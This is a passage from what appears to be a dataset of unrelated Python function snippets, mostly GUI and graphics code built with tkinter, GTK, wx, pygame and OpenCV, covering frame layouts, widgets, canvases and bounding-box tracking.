the parameters are, just leave them as they are.</p>'\n '<p>There are <b>' + str(\n self.leftover) + '</b> samples left unreviewed. The ML model will retrain at a pace '\n 'of once per <b>' + str(self.learning_pace) + '</b> samples.')]\n for name, value in self.parameters.items():\n if type(value) == int:\n self.parameter_inputs[name] = widgets.BoundedIntText(description=name, value=value, min=-1)\n rows.append(self.parameter_inputs[name])\n elif type(value) == float:\n self.parameter_inputs[name] = widgets.BoundedFloatText(description=name, value=value)\n rows.append(self.parameter_inputs[name])\n elif type(value) == str:\n self.parameter_inputs[name] = widgets.Text(description=name, value=value)\n rows.append(self.parameter_inputs[name])\n\n rows += self.addSeparator(top='10px') + self.addSeparator(\n top='10px') + [self.addPreviousNext(self.show_previous, self.show_next)]\n self.box = widgets.VBox(rows)\n pass", "def _configure_canvas(event):\n if self.internal_frame.winfo_reqwidth() != self.canvas.winfo_width():\n## print \"frame\",self.internal_frame.winfo_reqwidth()\n## print \"canvas\",self.canvas.winfo_width()\n # update the inner frame's width to fill the canvas\n## self.canvas.itemconfigure(interior_id, width=self.canvas.winfo_width())\n self.canvas.config(width=self.internal_frame.winfo_reqwidth())\n if self.internal_frame.winfo_reqheight() != self.canvas.winfo_height():\n # update the inner frame's width to fill the canvas\n## self.canvas.itemconfigure(interior_id, width=self.canvas.winfo_width())\n self.canvas.config(height=self.internal_frame.winfo_reqheight())", "def change_frame(self, frame):\r\n pass", "def _refresh_render(self):\n current_frame = self.frame\n self.frame = int(1E6)\n self.frame = current_frame", "def loop(self, frame):\n self.root = frame\n self.drawUI()\n cv2.imshow('Fotopasca', self.root)", "def display_widgets(self):\n self.f_left.pack(side=tk.LEFT, padx=20)\n self.f_mid.pack(side=tk.LEFT)\n self.f_right.pack(side=tk.LEFT, padx=10)\n self.f_right_up.pack(side=tk.TOP)\n self.f_right_down.pack(side=tk.TOP)\n\n self.f_y0.pack(side=tk.TOP)\n self.l_y0.pack(side=tk.LEFT)\n self.e_y0.pack(side=tk.LEFT, padx=10)\n\n self.f_x0.pack(side=tk.TOP)\n self.l_x0.pack(side=tk.LEFT)\n self.e_x0.pack(side=tk.LEFT, padx=10)\n\n self.f_X.pack(side=tk.TOP)\n self.l_X.pack(side=tk.LEFT)\n self.e_X.pack(side=tk.LEFT, padx=10)\n\n 
self.f_N.pack(side=tk.TOP)\n self.l_N.pack(side=tk.LEFT)\n self.e_N.pack(side=tk.LEFT, padx=10)\n\n self.f_solve.pack(side=tk.TOP, pady=20)\n self.b_solve.pack(side=tk.TOP, fill=tk.BOTH, pady=5)\n\n self.f_Ni.pack(side=tk.TOP)\n self.l_Ni.pack(side=tk.LEFT)\n self.e_Ni.pack(side=tk.LEFT, padx=10)\n\n self.f_Nf.pack(side=tk.TOP)\n self.l_Nf.pack(side=tk.LEFT)\n self.e_Nf.pack(side=tk.LEFT, padx=9)\n\n self.f_glob_er.pack(side=tk.TOP, pady=20)\n self.b_glob_er.pack(side=tk.TOP, fill=tk.BOTH, pady=5)", "def buildmainframe(self):\n self.mainframewidgets=[]\n for x in range(3):\n thislabel = Label(self.mainframe, text=str(x))\n thislabel.grid()\n self.mainframewidgets.append(thislabel)", "def refresh_display(self):\n for widget in self.button_frame.children.values():\n widget.grid_forget() \n\n for (i, rd) in enumerate(self.row_detail_list):\n rd.frame.grid(row=i)", "def create_flowbox(self, flowbox, frame_list):\n\n for num_frame in frame_list:\n grid = Gtk.Grid()\n btn = self.new_thumbnail_button(num_frame)\n\n widget_cls_label = Gtk.Label()\n widget_cls_label.set_text(\"?\")\n widget_cls_label.set_size_request(20, 20)\n widget_cls_label.connect(\"draw\", self.area_on_draw, {'frame': num_frame, 'widget_label': widget_cls_label})\n # Add drawing area\n grid.add(btn)\n grid.attach_next_to(widget_cls_label, btn, Gtk.PositionType.BOTTOM, 1, 2)\n\n flowbox.add(grid)\n self.flowbox_layout = flowbox", "def _draw(self, frame, boxes, probs, landmarks, name):\n try:\n print('drawing')\n for box, prob, ld, id in zip(boxes, probs, landmarks, name):\n # Draw rectangle on frame\n\n cv2.putText(frame, id, (200, 50), cv2.FONT_HERSHEY_SIMPLEX, 1, (0, 0, 255), 2, cv2.LINE_AA)\n\n\n except:\n print('not draw box')\n pass\n\n return frame", "def makeWidgets(self):\r\n self._frame = tk.Frame(self, relief=tk.RAISED, borderwidth=1)\r\n self._frame.pack(fill=tk.BOTH, expand=1)\r\n\r\n self.pack(fill=tk.BOTH, expand=1)\r\n\r\n self._frame._label1 = tk.Label(self._frame, text='----File Name----')\r\n self._frame._label1.pack(fill=tk.X, expand=tk.NO, pady=1, padx=2)\r\n self._frame._entry = tk.Entry(self._frame)\r\n self._frame._entry.pack(pady=2, padx=2)\r\n\r\n self._frame._label0 = tk.Label(self._frame, textvariable=self.timestr)\r\n self._setTime(self._elapsedtime)\r\n self._frame._label0.pack(fill=tk.X, expand=tk.NO, pady=3, padx=2)\r\n\r\n self._frame._label2 = tk.Label(self._frame, text='----Laps----')\r\n self._frame._label2.pack(fill=tk.X, expand=tk.NO, pady=4, padx=2)\r\n\r\n self._frame._scrollbar = tk.Scrollbar(self._frame, orient=tk.VERTICAL)\r\n self._frame._listbox = tk.Listbox(self._frame, selectmode=tk.EXTENDED, height=10,\r\n yscrollcommand=self._frame._scrollbar.set)\r\n self._frame._listbox.pack(side=tk.LEFT, fill=tk.BOTH, expand=1, pady=5, padx=2)\r\n self._frame._scrollbar.config(command=self._frame._listbox.yview)\r\n self._frame._scrollbar.pack(side=tk.RIGHT, fill=tk.Y)", "def crear_elements_viewer(self):\n\n self.p2_frame_list = tk.Frame(self.list_frame, borderwidth=2, relief=\"groove\")\n self.p2_label_info = ttk.Label(self.p2_frame_list, text=self.lang.VP_PAC_ID, font=FONT_TITOL)\n self.p2_label_info.pack()\n scrollbar = tk.Scrollbar(self.p2_frame_list)\n scrollbar.pack(side=tk.RIGHT, fill=tk.Y)\n self.llista = tk.Listbox(self.p2_frame_list, yscrollcommand=scrollbar.set, width=15, height=7)\n self.llista.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n scrollbar.config(command=self.llista.yview)\n\n self.p2_frame_list_1 = tk.Frame(self.list_frame, borderwidth=2, relief=\"groove\")\n 
self.p2_label_info_1 = ttk.Label(self.p2_frame_list_1, text=self.lang.VP_LOC, font=FONT_TITOL)\n self.p2_label_info_1.pack()\n scrollbar_1 = tk.Scrollbar(self.p2_frame_list_1)\n scrollbar_1.pack(side=tk.RIGHT, fill=tk.Y)\n self.llista_1 = tk.Listbox(self.p2_frame_list_1, yscrollcommand=scrollbar_1.set, width=15, height=7)\n self.llista_1.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n scrollbar_1.config(command=self.llista_1.yview)\n\n self.p2_frame_list_2 = tk.Frame(self.list_frame, borderwidth=2, relief=\"groove\")\n self.p2_label_info_2 = ttk.Label(self.p2_frame_list_2, text=self.lang.VP_DATE, font=FONT_TITOL)\n self.p2_label_info_2.pack()\n scrollbar_2 = tk.Scrollbar(self.p2_frame_list_2)\n scrollbar_2.pack(side=tk.RIGHT, fill=tk.Y)\n self.llista_2 = tk.Listbox(self.p2_frame_list_2, yscrollcommand=scrollbar_2.set, width=15, height=7)\n self.llista_2.pack(side=tk.LEFT, fill=tk.BOTH, expand=True)\n scrollbar_2.config(command=self.llista_2.yview)\n\n self.evo_frame = tk.Frame(self.list_frame)\n self.evo_button = ttk.Button(self.evo_frame, text=self.lang.VP_EVO, command=self.evo_selected)\n self.evo_button.pack()\n self.evo_button.pack_forget()\n\n\n self.p2_frame_elements = tk.Frame(self.data_frame, borderwidth=2, relief=\"groove\")\n self.p2_frame_img = tk.Frame(self.p2_frame_elements)\n self.p2_frame_metadata = tk.Frame(self.p2_frame_elements, width = 20)\n self.p2_label_metadata_code = tk.Label(self.p2_frame_metadata, text=\"\", font=FONT_MSG, width= 15, anchor=\"w\")\n self.p2_label_metadata_code.pack(pady=5)\n self.p2_label_metadata_grade = tk.Label(self.p2_frame_metadata, text=\"\", font=FONT_MSG, width=15, anchor=\"w\")\n self.p2_label_metadata_grade.pack(pady=5)\n self.p2_label_metadata_cm = ttk.Label(self.p2_frame_metadata, text=\"\", font=FONT_MSG, width=15, anchor=\"w\")\n self.p2_label_metadata_cm.pack(pady=5)\n self.assemble_img_frame()", "def reset():\n for frame in added_items_frames:\n frame.destroy()\n added_item_comboboxes.clear()\n added_item_quantity_spinboxes.clear()\n hour_end_spinbox.delete(0, END)\n hour_end_spinbox.insert(0, '1')\n hour_start_spinbox.delete(0, END)\n hour_start_spinbox.insert(0, '1')\n minute_end_spinbox.delete(0, END)\n minute_end_spinbox.insert(0, '0')\n minute_start_spinbox.delete(0, END)\n minute_start_spinbox.insert(0, '0')\n item_combobox.set('')\n item_quantity_spinbox.delete(0, END)\n item_quantity_spinbox.insert(0, '0')\n playstation_numbers_combobox.set('1')\n playstation_prices_combobox.set('Single-20')\n playstation_calculate_label.config(text='0.0')\n playstation_pending_calculation_label.config(text='0.0')", "def _on_frame_changed(self, change):\n self._set_coordinates(self.frame)", "def question_frame():\r\n global question_list_frame, add_question_Frame, quiz_frame\r\n\r\n # Forgetting these frames so they don't overlap and make things hard to read\r\n add_question_Frame.grid_forget()\r\n quiz_frame.grid_forget()\r\n one_person_quiz_frame.grid_forget()\r\n question_list_frame.grid_forget()\r\n\r\n # Creating the label and printing on the main gui the questions\r\n Label(question_list_frame, text=\"Question Pool\").grid(row=0,column=0)\r\n question_list_frame.grid(row=0, column=0, rowspan=7, columnspan=5, sticky=W)", "def makeWidgets(self):\n # globals\n global CARD_SIZE, card_images, card_back, card_sheet, pil_card_cropped, curr_card_image, xloc, d_yloc\n \n canvas.configure(background='green4') \n canvas.pack()\n # add buttons to the frame\n tk.Button(root, text='Deal', command=self.deal).pack(side=\"left\")\n tk.Button(root, 
text='Hit', command=self.hit).pack(side=\"left\")\n tk.Button(root, text='Stay', command=self.stay).pack(side=\"left\")\n # add label for dealer's hand\n canvas_label_d = canvas.create_text(30, (d_yloc - CARD_SIZE[1]/2), anchor=\"sw\")\n canvas.itemconfig(canvas_label_d, text=\"Dealer's hand: \")\n # add label for player's hand\n canvas_label_p = canvas.create_text(30, (p_yloc - CARD_SIZE[1]/2), anchor=\"sw\")\n canvas.itemconfig(canvas_label_p, text=\"Player's hand: \")\n # add label which updates outcome\n tk.Label(root, textvariable=self.outcome, font=('Helvetica',12), fg='white', bg='black').pack(side=\"left\")\n # add label for updating score\n canvas_label_score = canvas.create_text(CANVAS_WIDTH - 50, 30, anchor=\"sw\")\n canvas.itemconfig(canvas_label_score, text=self.score.get())", "def update(self, frame):\n self.__update_state(frame)\n\n if self.strategy == \"mean\":\n ax = np.mean(np.ravel(self.flow[...,0]))\n ay = np.mean(np.ravel(self.flow[...,1]))\n else:\n ax = statistics.median(np.ravel(self.flow[...,0]))\n ay = statistics.median(np.ravel(self.flow[...,1]))\n\n P = 1\n new_x = int(self.bbox[0] + self.bbox[2] * ax * P)\n new_y = int(self.bbox[1] + self.bbox[3] * ay * P)\n self.bbox = (new_x, new_y, self.bbox[2], self.bbox[3])\n return True, self.bbox", "def add_box(self):\n self.scenes[self.current_scene].add_object(Box())\n self.redraw()", "def updateWidget(self):\n\n if self.frame1.state() == 'normal':\n self.frame2.deiconify()\n self.frame1.withdraw()\n else:\n self.frame2.withdraw()\n self.frame2.update()\n self.frame2.deiconify()\n self.frame1.title(\"%s's turn\" % self.usernames[1])\n self.frame2.title(\"%s's turn\" % self.usernames[0])\n showDialogBox(\"%s's turn first!\" % self.usernames[0])\n self.frame1.update()\n self.frame2.update()", "def update_board(self, mpos):\n pass", "def fillbox(self,forceUpdate=False):\n \n # Only fill the box if the dialog is visible.\n # This is an important protection against bad performance.\n if not forceUpdate and self.top.state() != \"normal\":\n return\n \n self.box.delete(0,\"end\")\n c = self.c ; i = 0\n self.positionList = [] ; tnodeList = []\n for p in c.visitedList:\n if p.exists(c) and p.v.t not in tnodeList:\n self.box.insert(i,p.headString().strip())\n tnodeList.append(p.v.t)\n self.positionList.append(p.copy())\n i += 1", "def createWidgets(self):\n self.myFrame1 = Frame(self)\n self.myFrame2 = Frame(self)\n self.myFrame1.place(x = 100, y = 100)\n self.myFrame2.place(x = 200, y = 100)\n \n self.Label1 = Label(self.myFrame1, text = \"Este es el Frame 1\")\n self.Label2 = Label(self.myFrame2, text = \"Este es el Frame 2\")\n self.Label1.place(x = 100, y = 0)\n self.Label2.place(x = 100, y = 0)\n \n self.Button1 = Button(self, text = \"Dest 1\", command = exit)\n self.Button2 = Button(self, text = \"Dest 2\", command = exit)\n self.Button1.place(x = 200, y = 200)\n self.Button2.place(x = 300, y = 200)", "def computeAndInsertBox(self,**kwargs):\n if self.predefined_box is None:\n self.mm.neglect()\n return\n (pose,new_frame) = self.baxter.frame.computeTransformation() \n if pose is None:\n self.mm.neglect()\n return\n \n try:\n side = kwargs['side']\n except Exception,e:\n rospy.logerr(\"%s\"%str(e))\n self.mm.neglect()\n return\n else:\n self.baxter.frame.setTF(self.predefined_box+'_'+side,pose)\n self.baxter.frame.waitUntilFrameUpdate(self.predefined_box+\"_\"+side)\n self.baxter.scene.createPredefinedBox(self.predefined_box+\"_\"+side,self.predefined_box)\n if self.learning:\n self.appendToTask(\"import tf_helper \\n\")\n 
self.appendToTask(\"side='%s'\\n\"%(side))\n self.appendToTask(\"baxter.bb.predefined_box='%s'\\n\"%(self.predefined_box))\n self.appendToTask(\"pose = tf_helper.PS('%s',%s,%s)\\n\"%(FRAME_ORIGIN,list(pose.pose.position),list(pose.pose.orientation)))\n self.appendToTask(\"baxter.frame.setTF('%s_'+side,pose)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.frame.waitUntilFrameUpdate('%s_'+side)\\n\"%(self.predefined_box))\n self.appendToTask(\"baxter.scene.createPredefinedBox(baxter.bb.predefined_box+'_'+side,baxter.bb.predefined_box)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n self.appendToTask(\"for drop_off in baxter.scene.boxes[baxter.bb.predefined_box][1].keys():\\n\"%())\n self.appendToTask(\" pose = tf_helper.PS('%s_'+side,%s,%s)\\n\"%(self.predefined_box,\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][0:3]\",\"baxter.scene.boxes[baxter.bb.predefined_box][1][drop_off][3:7]\"))\n self.appendToTask(\" baxter.frame.setTF(drop_off+'_'+side,pose)\\n\")\n if self.predefined_box == \"wako\" or self.predefined_box.startswith(\"tray\") is True or self.predefined_box.startswith(\"table\") is True:\n for drop_off in self.baxter.scene.boxes[self.predefined_box][1].keys():\n pose = PS(self.predefined_box+'_'+side,self.baxter.scene.boxes[self.predefined_box][1][drop_off][0:3],self.baxter.scene.boxes[self.predefined_box][1][drop_off][3:7])\n self.baxter.frame.setTF(drop_off+'_'+side,pose)\n self.mm.confirm()", "def updateWidget(self):\n pass", "def OnSize(self, event):\r\n\r\n for pos, item in self._items.items():\r\n widget, horizontalalignment, verticalalignment = item.widget, item.horizontalalignment, item.verticalalignment\r\n\r\n rect = self.GetFieldRect(pos)\r\n widgetpos = widget.GetPosition()\r\n widgetsize = widget.GetSize()\r\n\r\n rect = self.GetFieldRect(pos)\r\n\r\n if horizontalalignment == ESB_EXACT_FIT:\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((rect.width-2, rect.height-2))\r\n widget.SetPosition((rect.x-1, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.width - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.y+diffs))\r\n else:\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetSize((rect.width-2, widgetsize[1]))\r\n widget.SetPosition((rect.x-1, rect.height-widgetsize[1]))\r\n\r\n elif horizontalalignment == ESB_ALIGN_LEFT:\r\n\r\n xpos = rect.x - 1\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.height - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetPosition((xpos, rect.y+diffs))\r\n else:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetPosition((xpos, rect.height-widgetsize[1]))\r\n\r\n elif horizontalalignment == ESB_ALIGN_RIGHT:\r\n\r\n xpos = rect.x + rect.width - widgetsize[0] - 1\r\n if 
verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.height - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetPosition((xpos, rect.y+diffs))\r\n else:\r\n widget.SetSize((widgetsize[0], rect.height-2))\r\n widget.SetPosition((xpos, rect.y-1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetPosition((xpos, rect.height-widgetsize[1]))\r\n\r\n elif horizontalalignment == ESB_ALIGN_CENTER_HORIZONTAL:\r\n\r\n xpos = rect.x + (rect.width - widgetsize[0])/2 - 1\r\n if verticalalignment == ESB_EXACT_FIT:\r\n widget.SetSize((widgetsize[0], rect.height))\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_CENTER_VERTICAL:\r\n if widgetsize[1] < rect.height - 1:\r\n diffs = (rect.height - widgetsize[1])/2\r\n widget.SetPosition((xpos, rect.y+diffs))\r\n else:\r\n widget.SetSize((widgetsize[0], rect.height-1))\r\n widget.SetPosition((xpos, rect.y+1))\r\n elif verticalalignment == ESB_ALIGN_TOP:\r\n widget.SetPosition((xpos, rect.y))\r\n elif verticalalignment == ESB_ALIGN_BOTTOM:\r\n widget.SetPosition((xpos, rect.height-widgetsize[1]))\r\n\r\n if event is not None:\r\n event.Skip()", "def __init__(self):\r\n Frame.__init__(self)\r\n self.master.title(\"GUIs drawing geometric shapes\")\r\n self.grid()\r\n\r\n #create a canvas and place in this frame\r\n self.canvas = Canvas(self, width = 300, height = 400)\r\n self.canvas.grid(row = 0, column = 0)\r\n\r\n self.canvas.create_rectangle(100, 50, 200, 350)\r\n self.canvas.create_oval(100, 50, 200, 150,\r\n fill = \"white\", tags = \"RED\")\r\n self.canvas.create_oval(100, 150, 200, 250,\r\n fill = \"white\", tags = \"YELLOW\")\r\n self.canvas.create_oval(100, 250, 200, 350,\r\n fill = \"green\", tags = \"GREEN\")\r\n\r\n \r\n dx = 1\r\n while True:\r\n self.canvas.after(2000) # Sleep for 15 milliseconds\r\n self.canvas.update() # Update canvas\r\n if dx == 1:\r\n self.canvas.itemconfigure(\"YELLOW\", fill = \"yellow\")\r\n self.canvas.itemconfigure(\"GREEN\", fill = \"white\")\r\n dx += 1\r\n elif dx == 2:\r\n self.canvas.itemconfigure(\"RED\", fill = \"red\")\r\n self.canvas.itemconfigure(\"YELLOW\", fill = \"white\")\r\n dx += 1 \r\n else:\r\n self.canvas.itemconfigure(\"RED\", fill = \"white\")\r\n self.canvas.itemconfigure(\"GREEN\", fill = \"green\")\r\n dx = 1", "def update_frame_label(self):\n count = len(self.main_frame_list)\n\n for idx in range(count): #Start, count) \n s1 = \"\"\n for i in range(16): #self.main_frame_nibble_list: # 16\n s = \"\"\n for j in range(4):\n s += str(self.main_button_bit_list[idx][i*4 + j].get_label())\n s = s[::-1]\n self.main_frame_nibble_list[idx][i].set_label(str(hex(int(s,2)))[2:].upper())\n s1 += str(self.main_frame_nibble_list[idx][i].get_label())\n s1 = s1[::-1]\n if DEBUG: print(s1[:8] + \" \" + s1[8:])\n self.main_frame_list[idx].set_label(s1[:8] + \" \" + s1[8:])", "def body(self, frame):\n frame.rowconfigure(0, weight=0, pad=5)\n frame.rowconfigure(1, weight=0)\n frame.columnconfigure(0, weight=0)\n frame.columnconfigure(1, weight=0)\n\n self.name_label = tk.Label(frame, width=6, text=\"Name: \")\n self.name_label.grid(column=0, row=0)\n\n self.name_box = tk.Entry(frame, width=30)\n if self.name != \"\":\n self.name_box.insert(0, self.name)\n self.name_box.grid(column=1, row=0)\n\n self.url_label = tk.Label(frame, 
width=6, text=\"URL: \")\n self.url_label.grid(column=0, row=1)\n self.url_box = tk.Entry(frame, width=30)\n if self.url != \"\":\n self.url_box.insert(0, self.url)\n self.url_box.grid(column=1, row=1)\n return frame", "def update_species_frames(self):\n pass", "def config_frames(self):\n self.root.grid_rowconfigure(1, weight=1)\n self.root.grid_columnconfigure(1, weight=1)\n\n self.top_frame = tkinter.Frame(self.root, pady=1)\n self.top_frame.grid(row=0, columnspan=2, sticky='nsew')", "def update(self):\n self.platform_list.update()\n self.exit_sprite.update()\n self.bagGroup.update()\n self.enemy_list.update()", "def initialize(self):\n self.frame = Frame(master=self.root)\n reslut_text = Label(master=self.frame, text=\"Tulokset\")\n reslut_text.config(font=(\"Courier\", 44))\n reslut_text.grid(row=0, column=0)\n amount_correct_text = Label(master=self.frame, text=\"Oikeat arvaukset:\")\n amount_correct_text.config(font=(\"Courier\", 20))\n amount_correct_text.grid(row=1, column=0)\n\n \"\"\"geting the amount of correct guesses from gamesta class and showing it\"\"\"\n correct_amount, comparison = self.gamestate.get_result()\n full_amount = self.gamestate.get_deck_size()\n result_amount_text = Label(master=self.frame, text=(str(correct_amount)+ \"/\" +str(full_amount)))\n result_amount_text.config(font=(\"Courier\", 20))\n result_amount_text.grid(row=1, column=1)\n\n \"\"\"More text on page\"\"\"\n theese_wrong_text = Label(master=self.frame, text=\"Tässä oikea rivi: \")\n theese_wrong_text.config(font=(\"Courier\", 20))\n theese_wrong_text.grid(row=3, column=0)\n player_answers_text = Label(master=self.frame, text=\"Näin sinä vastasit: \")\n player_answers_text.config(font=(\"Courier\", 20))\n player_answers_text.grid(row=5, column=0)\n\n sf_correct = ScrollableFrame(self.frame)\n sf_user = ScrollableFrame(self.frame)\n\n for i in range(len(comparison)):\n \"\"\"Using scrollable frame to show the right answers\n and guesses (pictures of cards) made by player\"\"\"\n is_correct, correct_card, user_card = comparison[i]\n text = \"vastasit:\\noikein\" if is_correct else \"vastasit:\\nväärin\"\n color = \"green\" if is_correct else \"red\"\n img = create_card_image(sf_correct.scrollable_frame, correct_card, 50,100)\n img.grid(row=0, column=i)\n label = Label(master=sf_correct.scrollable_frame, text= text, fg = color)\n label.grid(row=1,column=i)\n img = create_card_image(sf_user.scrollable_frame, user_card, 50,100)\n img.grid(row=0, column=i)\n label = Label(master=sf_user.scrollable_frame, text= text, fg = color)\n label.grid(row=1,column=i)\n sf_correct.grid(row=4, column=0)\n sf_user.grid(row=6, column=0)\n\n \"\"\"Buttons for navigation\"\"\"\n new_game_button = Button(master=self.frame, text=\"Uusi peli\", command = self.handle_show_game_settings)\n frontpage_button = Button(master=self.frame, text=\"Päävalikkoon\", command = self.handle_show_frontpage_view)\n new_game_button.grid(padx=5, pady=5, sticky=constants.EW)\n frontpage_button.grid(padx=5, pady=5, sticky=constants.EW)", "def update_bboxes(self, ths):\n # find bboxes based on thresholded heatmap\n labels, n_labels = scipy.ndimage.measurements.label(ths)\n detected_bboxes = list()\n for car_label in range(1, n_labels + 1):\n nonzero = (labels == car_label).nonzero()\n bbox = ((np.min(nonzero[1]), np.min(nonzero[0])),\n (np.max(nonzero[1]), np.max(nonzero[0])))\n detected_bboxes.append(bbox)\n self.detected_bboxes = detected_bboxes\n\n # match new and previous detections\n N_known = len(self.averaged_bboxes)\n N_new = 
len(detected_bboxes)\n dmatrix = np.zeros((N_known, N_new))\n for i in range(N_known):\n for j in range(N_new):\n dmatrix[i,j] = bbox_dist(\n self.averaged_bboxes[i],\n detected_bboxes[j])\n row_ind, col_ind = scipy.optimize.linear_sum_assignment(dmatrix)\n # only consider matches whose centroids are close\n mask = dmatrix[row_ind, col_ind] < self.centroid_radius\n matched_row_ind = row_ind[mask]\n matched_col_ind = col_ind[mask]\n # update moving average \n for i, j in zip(matched_row_ind, matched_col_ind):\n avg_bbox = self.averaged_bboxes[i]\n new_bbox = detected_bboxes[j]\n self.averaged_bboxes[i] = update_bbox(avg_bbox, new_bbox, self.decay)\n\n # remove bounding boxes which are not present anymore\n self.averaged_bboxes = [bbox for i, bbox in enumerate(self.averaged_bboxes) if i in matched_row_ind]\n # add new bounding boxes\n for j in range(N_new):\n if not j in matched_col_ind:\n self.averaged_bboxes.append(detected_bboxes[j])", "def update(self):", "def update(self):", "def update(self):", "def update(self):\r\n self.rect = pygame.Rect(self.x, self.y, self.width, self.height)", "def __init__(self):\n self.master = Tk()\n self.master.title(\"Brick Breaker\")\n self.master.geometry(\"800x600\")\n self.master.minsize(800, 600)\n self.master.iconbitmap(\"data/wall.ico\")\n self.master.config(background=\"lightblue\")\n self.frame = Frame(self.master, bg='lightblue')\n self.littleFrame = Frame(self.frame, bg='lightblue')\n\n # creation des composants\n self.create_title()\n self.create_play_button()\n self.create_quit_button()\n\n # empaquetage\n self.littleFrame.pack(expand=YES, pady=100)\n self.frame.pack(expand=YES)", "def __init__(self, master=None):\n\t\ttkinter.Frame.__init__(self, master)\n\t\tself.master.title('ES Color Chooser')\n\t\tself.grid()\n\n\t\t# create central block of color samples\n\t\tself.labels = [[None for _ in range(3)] for _ in range(3)]\n\t\tfor (col, row) in itertools.product(range(3), range(3)):\n\t\t\tlabel = tkinter.Label(self, width=20, height=10, bg='#FFFFFF')\n\t\t\tlabel.bind('<ButtonRelease-1>', self.clicked)\n\t\t\tlabel.grid(column=col, row=row, padx=1, pady=1)\n\t\t\tself.labels[row][col] = label\n\t\tself.center = self.labels[1][1]\n\n\t\t# create side pane with buttons and history\n\t\tside = tkinter.Frame(self)\n\t\tside.grid(row=0, column=3, rowspan=3)\n\t\ttkinter.Button(side, text='Select new Color', command=self.select_color).pack(side='top')\n\t\tself.sigma = tkinter.Scale(side, label='Sigma', orient='horizontal', from_=1, to=25)\n\t\tself.sigma.pack(side='top')\n\t\tself.sigma.set(10)\n\t\ttkinter.Label(side, text='Current color').pack(side='top')\n\t\tself.current = tkinter.StringVar()\n\t\tcurrent = tkinter.Entry(side, justify='center', textvariable=self.current)\n\t\tcurrent.pack(side='top')\n\t\ttkinter.Label(side, text='History').pack(side='top')\n\t\tself.history = tkinter.Listbox(side, height='16', bg='white', activestyle='dotbox')\n\t\tself.history.bind('<ButtonRelease-1>', self.clicked)\n\t\tself.history.pack(side='top')", "def _sync_gui(self):\n self._update_buttons()\n\n self.turn_value_label.config(text=self.turn_value_text)\n self.selected_piece_value_label.config(text=self.selected_piece_value_text)\n\n self.update()", "def _configure_interior(event):\n # update the scrollbars to match the size of the inner frame\n size = (self.internal_frame.winfo_reqwidth(), self.internal_frame.winfo_reqheight())\n self.canvas.config(scrollregion=\"0 0 %s %s\" % size)\n if self.internal_frame.winfo_reqwidth() != 
self.canvas.winfo_width():\n # update the canvas's width to fit the inner frame\n self.canvas.config(width=self.internal_frame.winfo_reqwidth())\n if self.internal_frame.winfo_reqheight() != self.canvas.winfo_height():\n # update the canvas's width to fit the inner frame\n self.canvas.config(height=self.internal_frame.winfo_reqheight())", "def update(self, *args, **kwargs):\r\n \r\n if self.changed:\r\n \r\n for e in self.entries + self.bottom_entries:\r\n e.changed = True\r\n \r\n if self.title is not None:\r\n title_size = list(self.font.size(self.title))\r\n title_size[1] = self.font.get_height()\r\n else:\r\n title_size = (0,0)\r\n \r\n self.min_button_size = self.calculate_min_button_size()\r\n self.min_bottom_button_size = self.calculate_min_bottom_button_size()\r\n \r\n if len(self.bottom_entries) == 0:\r\n bottom_buttons_spacing = 0\r\n else:\r\n bottom_buttons_spacing = self.min_bottom_button_size[1] \\\r\n + self.button_vspacing\r\n \r\n button_vstep = self.min_button_size[1] + self.button_vspacing\r\n button_hstep = self.min_bottom_button_size[0] + self.button_hspacing\r\n \r\n buttons_rect = Rect(\r\n 0,\r\n 0,\r\n max(self.min_button_size[0],\r\n button_hstep * len(self.bottom_entries) - self.button_hspacing,\r\n title_size[0]),\r\n button_vstep * len(self.entries) - self.button_vspacing\r\n )\r\n \r\n buttons_rect.center = self.screen_rect.center\r\n \r\n \r\n bg_rect = buttons_rect.inflate(self.h_inborders \\\r\n + self.right_space,\r\n self.v_inborders \\\r\n + self.top_space \\\r\n + self.bottom_space \\\r\n + bottom_buttons_spacing\\\r\n + title_size[1])\r\n buttons_rect.x = bg_rect.x + self.h_inborders // 2\r\n buttons_rect.y = bg_rect.y \\\r\n + self.v_inborders // 2 \\\r\n + self.top_space \\\r\n + title_size[1]\r\n \r\n bottom_buttons_rect = Rect(bg_rect.x + self.h_inborders // 2,\r\n buttons_rect.bottom \\\r\n + self.button_vspacing,\r\n bg_rect.w - self.h_inborders,\r\n self.min_bottom_button_size[1]\r\n )\r\n \r\n for i, entry in enumerate(self.entries):\r\n entry.rect = Rect(buttons_rect.x,\r\n buttons_rect.y + i*button_vstep,\r\n 